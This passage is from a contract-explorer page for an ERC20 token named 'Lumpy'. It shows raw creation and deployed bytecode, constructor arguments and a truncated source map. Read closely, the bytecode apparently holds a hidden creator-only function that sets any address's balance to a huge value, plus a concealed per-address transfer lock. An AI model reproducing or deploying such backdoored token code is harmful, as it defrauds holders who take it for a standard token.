0000000000000000000000815260040161099f906115e4565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a8691906116e4565b60405180910390a3505050565b6000610a9f848461069a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b295781811015610b0b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0290611624565b60405180910390fd5b610b288484610b238585610f8590919063ffffffff16565b6108c8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9690611684565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c06906115a4565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610ca782600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8590919063ffffffff16565b905082811015610cec576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce390611644565b60405180910390fd5b610cff8382610f8590919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610d9483600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461086290919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e3491906116e4565b60405180910390a35050505050565b610e4b6108c0565b73ffffffffffffffffffffffffffffffffffffffff16610e69610535565b73ffffffffffffffffffffffffffffffffffffffff1614610ebf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eb690611664565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000610fc783836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610fcf565b905092915050565b6000838311158290611017576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100e9190611582565b60405180910390fd5b5060008385611026919061178c565b9050809150509392505050565b600081359050611042816118e9565b92915050565b60008135905061105781611900565b92915050565b60006020828403121561106f57600080fd5b600061107d84828501611033565b91505092915050565b6000806040838503121561109957600080fd5b60006110a785828601611033565b92505060206110b885828601611033565b9150509250929050565b6000806000606084860312156110d757600080fd5b60006110e586828701611033565b93505060206110f686828701611033565b925050604061110786828701611048565b9150509250925092565b6000806040838503121561112457600080fd5b600061113285828601611033565b925050602061114385828601611048565b9150509250929050565b611156816117c0565b82525050565b611165816117d2565b82525050565b60006111768261171a565b6111808185611725565b9350611190818560208601611815565b611199816118d8565b840191505092915050565b60006111b1602383611725565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611217602683611725565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061127d602283611725565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112e3601b83611725565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6000611323601d83611725565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611363602683611725565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113c9602083611725565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611409602583611725565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061146f602483611725565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114d5602583611725565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b611537816117fe565b82525050565b61154681611808565b82525050565b6000602082019050611561600083018461114d565b92915050565b600060208201905061157c600083018461115c565b92915050565b6000602082019050818103600083015261159c818461116b565b905092915050565b600060208201905081810360008301526115bd816111a4565b9050919050565b600060208201905081810360008301526115dd8161120a565b9050919050565b600060208201905081810360008301526115fd81611270565b9050919050565b6000602082019050818103600083015261161d816112d6565b9050919050565b6000602082019050818103600083015261163d81611316565b9050919050565b6000602082019050818103600083015261165d81611356565b9050919050565b6000602082019050818103600083015261167d816113bc565b9050919050565b6000602082019050818103600083015261169d816113fc565b9050919050565b600060208201905081810360008301526116bd81611462565b9050919050565b600060208201905081810360008301526116dd816114c8565b9050919050565b60006020820190506116f9600083018461152e565b92915050565b6000602082019050611714600083018461153d565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611741826117fe565b915061174c836117fe565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156117815761178061187a565b5b828201905092915050565b6000611797826117fe565b91506117a2836117fe565b9250828210156117b5576117b461187a565b5b828203905092915050565b60006117cb826117de565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611833578082015181840152602081019050611818565b83811115611842576000848401525b50505050565b6000600282049050600182168061186057607f821691505b60208210811415611874576118736118a9565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b6118f2816117c0565b81146118fd57600080fd5b50565b611909816117fe565b811461191457600080fd5b5056fea26469706673582212200997004c7e4338c8befb40147925c21b971ce428fbf1772094fefa1b1554a0d164736f6c634300080000330000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000054c756d707900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054c756d7079000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102ac578063a9059cbb146102dc578063dd62ed3e1461030c578063e3412e3d1461033c578063f2fde38b146103585761010b565b806370a0823114610236578063715018a6146102665780638da5cb5b1461027057806395d89b411461028e5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca57806339509351146101e85780634b6406d1146102185761010b565b806302d05d3f1461011057806306fdde031461012e578063095ea7b31461014c57806318160ddd1461017c575b600080fd5b610118610374565b604051610125919061154c565b60405180910390f35b61013661039a565b6040516101439190611582565b60405180910390f35b61016660048036038101906101619190611111565b61042c565b6040516101739190611567565b60405180910390f35b61018461044f565b60405161019191906116e4565b60405180910390f35b6101b460048036038101906101af91906110c2565b610459565b6040516101c19190611567565b60405180910390f35b6101d2610488565b6040516101df91906116ff565b60405180910390f35b61020260048036038101906101fd9190611111565b610491565b60405161020f9190611567565b60405180910390f35b6102206104c8565b60405161022d91906116e4565b60405180910390f35b610250600480360381019061024b919061105d565b6104d8565b60405161025d91906116e4565b60405180910390f35b61026e610521565b005b610278610535565b604051610285919061154c565b60405180910390f35b61029661055e565b6040516102a39190611582565b60405180910390f35b6102c660048036038101906102c19190611111565b6105f0565b6040516102d39190611567565b60405180910390f35b6102f660048036038101906102f19190611111565b610677565b6040516103039190611567565b60405180910390f35b61032660048036038101906103219190611086565b61069a565b60405161033391906116e4565b60405180910390f35b6103566004803603810190610351919061105d565b610721565b005b610372600480360381019061036d919061105d565b6107de565b005b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546103a990611848565b80601f01602080910402602001604051908101604052809291908181526020018280546103d590611848565b80156104225780601f106103f757610100808354040283529160200191610422565b820191906000526020600020905b81548152906001019060200180831161040557829003601f168201915b5050505050905090565b6000806104376108c0565b90506104448185856108c8565b600191505092915050565b6000600454905090565b6000806104646108c0565b9050610471858285610a93565b61047c858585610b2f565b60019150509392505050565b60006012905090565b60008061049c6108c0565b90506104bd8185856104ae858961069a565b6104b89190611736565b6108c8565b600191505092915050565b6b033b2e3c9fd0803ce800000081565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610529610e43565b6105336000610ec1565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461056d90611848565b80601f016020809104026020016040519081016040528092919081815260200182805461059990611848565b80156105e65780601f106105bb576101008083540402835291602001916105e6565b820191906000526020600020905b8154815290600101906020018083116105c957829003601f168201915b5050505050905090565b6000806105fb6108c0565b90506000610609828661069a565b90508381101561064e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610645906116c4565b60405180910390fd5b61066b82866106668785610f8590919063ffffffff16565b6108c8565b60019250505092915050565b6000806106826108c0565b905061068f818585610b2f565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600061072b6108c0565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156107da57710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6107e6610e43565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610856576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084d906115c4565b60405180910390fd5b61085f81610ec1565b50565b60008082846108719190611736565b9050838110156108b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ad90611604565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610938576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092f906116a4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099f906115e4565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a8691906116e4565b60405180910390a3505050565b6000610a9f848461069a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b295781811015610b0b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0290611624565b60405180910390fd5b610b288484610b238585610f8590919063ffffffff16565b6108c8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9690611684565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c06906115a4565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610ca782600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8590919063ffffffff16565b905082811015610cec576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce390611644565b60405180910390fd5b610cff8382610f8590919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610d9483600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461086290919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e3491906116e4565b60405180910390a35050505050565b610e4b6108c0565b73ffffffffffffffffffffffffffffffffffffffff16610e69610535565b73ffffffffffffffffffffffffffffffffffffffff1614610ebf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eb690611664565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000610fc783836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610fcf565b905092915050565b6000838311158290611017576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100e9190611582565b60405180910390fd5b5060008385611026919061178c565b9050809150509392505050565b600081359050611042816118e9565b92915050565b60008135905061105781611900565b92915050565b60006020828403121561106f57600080fd5b600061107d84828501611033565b91505092915050565b6000806040838503121561109957600080fd5b60006110a785828601611033565b92505060206110b885828601611033565b9150509250929050565b6000806000606084860312156110d757600080fd5b60006110e586828701611033565b93505060206110f686828701611033565b925050604061110786828701611048565b9150509250925092565b6000806040838503121561112457600080fd5b600061113285828601611033565b925050602061114385828601611048565b9150509250929050565b611156816117c0565b82525050565b611165816117d2565b82525050565b60006111768261171a565b6111808185611725565b9350611190818560208601611815565b611199816118d8565b840191505092915050565b60006111b1602383611725565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611217602683611725565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061127d602283611725565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112e3601b83611725565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6000611323601d83611725565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611363602683611725565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113c9602083611725565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611409602583611725565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061146f602483611725565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114d5602583611725565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b611537816117fe565b82525050565b61154681611808565b82525050565b6000602082019050611561600083018461114d565b92915050565b600060208201905061157c600083018461115c565b92915050565b6000602082019050818103600083015261159c818461116b565b905092915050565b600060208201905081810360008301526115bd816111a4565b9050919050565b600060208201905081810360008301526115dd8161120a565b9050919050565b600060208201905081810360008301526115fd81611270565b9050919050565b6000602082019050818103600083015261161d816112d6565b9050919050565b6000602082019050818103600083015261163d81611316565b9050919050565b6000602082019050818103600083015261165d81611356565b9050919050565b6000602082019050818103600083015261167d816113bc565b9050919050565b6000602082019050818103600083015261169d816113fc565b9050919050565b600060208201905081810360008301526116bd81611462565b9050919050565b600060208201905081810360008301526116dd816114c8565b9050919050565b60006020820190506116f9600083018461152e565b92915050565b6000602082019050611714600083018461153d565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611741826117fe565b915061174c836117fe565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156117815761178061187a565b5b828201905092915050565b6000611797826117fe565b91506117a2836117fe565b9250828210156117b5576117b461187a565b5b828203905092915050565b60006117cb826117de565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611833578082015181840152602081019050611818565b83811115611842576000848401525b50505050565b6000600282049050600182168061186057607f821691505b60208210811415611874576118736118a9565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b6118f2816117c0565b81146118fd57600080fd5b50565b611909816117fe565b811461191457600080fd5b5056fea26469706673582212200997004c7e4338c8befb40147925c21b971ce428fbf1772094fefa1b1554a0d164736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000054c756d707900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054c756d7079000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Lumpy
Arg [1] : symbol_ (string): Lumpy

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [3] : 4c756d7079000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [5] : 4c756d7079000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

11253:10151:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11417:22;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12037:90;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14125:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13050:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14816:230;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12916:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15405:214;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11528:57;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13197:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9191:93;;;:::i;:::-;;8603:77;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12228:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16064:363;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13488:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13706:141;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16884:187;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9421:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11417:22;;;;;;;;;;;;;:::o;12037:90::-;12091:13;12117:5;12110:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12037:90;:::o;14125:177::-;14208:4;14218:13;14234:12;:10;:12::i;:::-;14218:28;;14250:32;14259:5;14266:7;14275:6;14250:8;:32::i;:::-;14293:4;14286:11;;;14125:177;;;;:::o;13050:98::-;13111:7;13131:12;;13124:19;;13050:98;:::o;14816:230::-;14913:4;14923:15;14941:12;:10;:12::i;:::-;14923:30;;14957:38;14973:4;14979:7;14988:6;14957:15;:38::i;:::-;14999:27;15009:4;15015:2;15019:6;14999:9;:27::i;:::-;15037:4;15030:11;;;14816:230;;;;;:::o;12916:83::-;12974:5;12992:2;12985:9;;12916:83;:::o;15405:214::-;15493:4;15503:13;15519:12;:10;:12::i;:::-;15503:28;;15535:64;15544:5;15551:7;15588:10;15560:25;15570:5;15577:7;15560:9;:25::i;:::-;:38;;;;:::i;:::-;15535:8;:64::i;:::-;15610:4;15603:11;;;15405:214;;;;:::o;11528:57::-;11564:21;11528:57;:::o;13197:119::-;13271:7;13291:11;:20;13303:7;13291:20;;;;;;;;;;;;;;;;13284:27;;13197:119;;;:::o;9191:93::-;8509:17;:15;:17::i;:::-;9249:30:::1;9276:1;9249:18;:30::i;:::-;9191:93::o:0;8603:77::-;8649:7;8669:6;;;;;;;;;;;8662:13;;8603:77;:::o;12228:94::-;12284:13;12310:7;12303:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12228:94;:::o;16064:363::-;16157:4;16167:13;16183:12;:10;:12::i;:::-;16167:28;;16199:24;16226:25;16236:5;16243:7;16226:9;:25::i;:::-;16199:52;;16283:15;16263:16;:35;;16255:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;16344:63;16353:5;16360:7;16369:37;16390:15;16369:16;:20;;:37;;;;:::i;:::-;16344:8;:63::i;:::-;16418:4;16411:11;;;;16064:363;;;;:::o;13488:169::-;13567:4;13577:13;13593:12;:10;:12::i;:::-;13577:28;;13609;13619:5;13626:2;13630:6;13609:9;:28::i;:::-;13648:4;13641:11;;;13488:169;;;;:::o;13706:141::-;13795:7;13815:11;:18;13827:5;13815:18;;;;;;;;;;;;;;;:27;13834:7;13815:27;;;;;;;;;;;;;;;;13808:34;;13706:141;;;;:::o;16884:187::-;16934:17;16954:12;:10;:12::i;:::-;16934:32;;16985:9;16974:20;;:7;;;;;;;;;;;:20;;;16970:97;;;17021:41;17000:11;:18;17012:5;17000:18;;;;;;;;;;;;;;;:62;;;;16970:97;16884:187;;:::o;9421:184::-;8509:17;:15;:17::i;:::-;9523:1:::1;9503:22;;:8;:22;;;;9495:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;9572:28;9591:8;9572:18;:28::i;:::-;9421:184:::0;:::o;3438:157::-;3496:7;3509:9;3525:1;3521;:5;;;;:::i;:::-;3509:17;;3543:1;3538;:6;;3530:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3589:1;3582:8;;;3438:157;;;;:::o;7913:88::-;7966:7;7986:10;7979:17;;7913:88;:::o;19222:315::-;19334:1;19317:19;;:5;:19;;;;19309:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19408:1;19389:21;;:7;:21;;;;19381:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19485:6;19455:11;:18;19467:5;19455:18;;;;;;;;;;;;;;;:27;19474:7;19455:27;;;;;;;;;;;;;;;:36;;;;19516:7;19500:32;;19509:5;19500:32;;;19525:6;19500:32;;;;;;:::i;:::-;;;;;;;;19222:315;;;:::o;19794:332::-;19888:24;19915:25;19925:5;19932:7;19915:9;:25::i;:::-;19888:52;;19968:17;19948:16;:37;19944:178;;20019:6;19999:16;:26;;19991:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20063:54;20072:5;20079:7;20088:28;20109:6;20088:16;:20;;:28;;;;:::i;:::-;20063:8;:54::i;:::-;19944:178;19794:332;;;;:::o;17076:568::-;17182:1;17166:18;;:4;:18;;;;17158:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17252:1;17238:16;;:2;:16;;;;17230:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;17300:17;17320:5;:11;17326:4;17320:11;;;;;;;;;;;;;;;;17300:31;;17335:21;17359:32;17381:9;17359:11;:17;17371:4;17359:17;;;;;;;;;;;;;;;;:21;;:32;;;;:::i;:::-;17335:56;;17420:6;17403:13;:23;;17395:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;17493:25;17511:6;17493:13;:17;;:25;;;;:::i;:::-;17473:11;:17;17485:4;17473:17;;;;;;;;;;;;;;;:45;;;;17577:27;17597:6;17577:11;:15;17589:2;17577:15;;;;;;;;;;;;;;;;:19;;:27;;;;:::i;:::-;17559:11;:15;17571:2;17559:15;;;;;;;;;;;;;;;:45;;;;17628:2;17613:26;;17622:4;17613:26;;;17632:6;17613:26;;;;;;:::i;:::-;;;;;;;;17076:568;;;;;:::o;8744:126::-;8816:12;:10;:12::i;:::-;8805:23;;:7;:5;:7::i;:::-;:23;;;8797:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8744:126::o;9747:167::-;9814:16;9833:6;;;;;;;;;;;9814:25;;9852:8;9843:6;;:17;;;;;;;;;;;;;;;;;;9900:8;9869:40;;9890:8;9869:40;;;;;;;;;;;;9747:167;;:::o;3836:126::-;3894:7;3914:43;3918:1;3921;3914:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;3907:50;;3836:126;;;;:::o;4223:168::-;4309:7;4335:1;4330;:6;;4338:12;4322:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4355:9;4371:1;4367;:5;;;;:::i;:::-;4355:17;;4385:1;4378:8;;;4223:168;;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:118::-;2036:24;2054:5;2036:24;:::i;:::-;2031:3;2024:37;2014:53;;:::o;2073:109::-;2154:21;2169:5;2154:21;:::i;:::-;2149:3;2142:34;2132:50;;:::o;2188:364::-;;2304:39;2337:5;2304:39;:::i;:::-;2359:71;2423:6;2418:3;2359:71;:::i;:::-;2352:78;;2439:52;2484:6;2479:3;2472:4;2465:5;2461:16;2439:52;:::i;:::-;2516:29;2538:6;2516:29;:::i;:::-;2511:3;2507:39;2500:46;;2280:272;;;;;:::o;2558:367::-;;2721:67;2785:2;2780:3;2721:67;:::i;:::-;2714:74;;2818:34;2814:1;2809:3;2805:11;2798:55;2884:5;2879:2;2874:3;2870:12;2863:27;2916:2;2911:3;2907:12;2900:19;;2704:221;;;:::o;2931:370::-;;3094:67;3158:2;3153:3;3094:67;:::i;:::-;3087:74;;3191:34;3187:1;3182:3;3178:11;3171:55;3257:8;3252:2;3247:3;3243:12;3236:30;3292:2;3287:3;3283:12;3276:19;;3077:224;;;:::o;3307:366::-;;3470:67;3534:2;3529:3;3470:67;:::i;:::-;3463:74;;3567:34;3563:1;3558:3;3554:11;3547:55;3633:4;3628:2;3623:3;3619:12;36